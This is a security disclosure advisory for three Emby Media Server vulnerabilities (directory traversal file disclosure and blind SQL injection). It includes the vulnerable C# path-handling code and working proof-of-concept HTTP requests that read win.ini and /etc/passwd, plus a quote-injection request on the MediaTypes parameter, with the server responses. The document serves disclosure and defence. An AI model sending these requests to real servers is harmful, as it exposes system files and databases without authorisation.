SSD Advisory – Emby Media Server Multiple Vulnerabilities

Vulnerabilities Summary
The following advisory describes three (3) vulnerabilities found in Emby Media Server.
Affected versions are: 3.1.5, 3.1.2, 3.1.1, 3.1.0 and 3.0.0.
Emby Media Server (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client server model. Two comparable media servers are Plex and Windows Media Center.
The vulnerabilities found in Emby Media Server are:

  • Directory Traversal
  • File Disclosure
  • SQL Injection

Credit
An independent security researcher Gjoko Krstic from Zero Science Lab has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor Response
Emby has been notified in March 2017 about the vulnerability, shortly after they have released a new version that addresses this vulnerabilities. They however have not provided any version information or release notes that reflect this.

Vulnerabilities Details
Directory Traversal File Disclosure
Emby Media Server is suffer from Directory Traversal File Disclosure vulnerability. Input passed via the ‘swagger-ui‘ object in SwaggerService.cs is not properly verified before being used to load resources. This can be exploited to disclose the contents of arbitrary files via directory traversal attacks.
Version 3.1.0 is affecting Linux, Windows and Mac platforms.
Version 3.1.5 only affects Windows release.
Vulnerable Code
Vulnerable file path: /Emby.Server.Implementations/HttpServer/SwaggerService.cs

using MediaBrowser.Controller;
using MediaBrowser.Controller.Net;
using System.IO;
using MediaBrowser.Model.IO;
using MediaBrowser.Model.Services;
namespace Emby.Server.Implementations.HttpServer
{
    public class SwaggerService : IService, IRequiresRequest
    {
        private readonly IServerApplicationPaths _appPaths;
        private readonly IFileSystem _fileSystem;
        public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory)
        {
            _appPaths = appPaths;
            _fileSystem = fileSystem;
            _resultFactory = resultFactory;
        }
        /// <summary>
        /// Gets the specified request.
        /// </summary>
        /// <param name="request">The request.</param>
        /// <returns>System.Object.</returns>
        public object Get(GetSwaggerResource request)
        {
            var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, "swagger-ui");
            var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar));
            return _resultFactory.GetStaticFileResult(Request, requestedFile).Result;
        }
        /// <summary>
        /// Gets or sets the result factory.
        /// </summary>
        /// <value>The result factory.</value>
        private readonly IHttpResultFactory _resultFactory;
        /// <summary>
        /// Gets or sets the request context.
        /// </summary>
        /// <value>The request context.</value>
        public IRequest Request { get; set; }
    }
}

Proof of Concept
An attacker sends the following request (when Emby runs on a Windows machine):

GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1

The server responds with:

HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "07bec80f76d20d26dd300a855219d321"
Cache-Control: public
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: application/octet-stream
Date: Thu, 22 Dec 2016 10:43:53 GMT
Content-Length: 403
Connection: close
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo

When Emby runs on a Linux machine a similar request:

http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Would yield this server response:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
...

SQL Injection
Emby suffers from a blind SQL injection vulnerability. Input passed via the GET parameter ‘MediaTypes’ is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code without authentication.
Proof of Concept
An attacker sends the following request:

GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo'&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1
Host: 10.211.55.3:8096
accept: application/json
x-mediabrowser-token: ba5a68dfa1134bd6af642228bbf757bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome 55.0.2883.87", DeviceId="104a154d5aa8c9576a2508113b47a53b6170253c", Version="3.1.0.0", UserId="abb355429db54e159ac2a7a3cbd6eb12"
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close

Server response:

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Mono-HTTPAPI/1.0
Date: Tue, 21 Feb 2017 12:06:09 GMT
Content-Length: 64
Connection: close
Exception of type 'SQLitePCL.pretty.SQLiteException' was thrown.